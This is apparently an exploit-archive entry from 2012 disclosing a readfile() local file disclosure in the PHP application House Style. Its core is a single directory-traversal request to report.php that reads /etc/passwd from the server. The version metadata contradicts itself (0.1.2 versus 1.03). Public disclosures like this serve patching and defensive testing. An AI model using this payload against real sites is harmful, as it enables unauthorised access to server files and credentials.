[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : House Style 0.1.2 => readfile() Local File Disclosure Vulnerability
# Published : 2012-07-12
# Author :
# Previous Title : CakePHP 2.x-2.2.0-RC2 XXE Injection
# Next Title : Zoho BugTracker Multiple Stored XSS Vulnerabilities
# Exploit Title: House Style 0.1.2 => readfile() Local File Disclosure Vulnerability
# Date: 11/07/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/housestyle/
# Version: 1.03
# Category:: readfile() Local File Disclosure Vulnerability2
# Tested on: Xp SP 2
# Ex : [House Style 0.1.2]/report.php?file=../../../../../../../../../../../../../../etc/passwd
# See Test : http://upload.traidnt.net/upfiles/aqz25984.jpg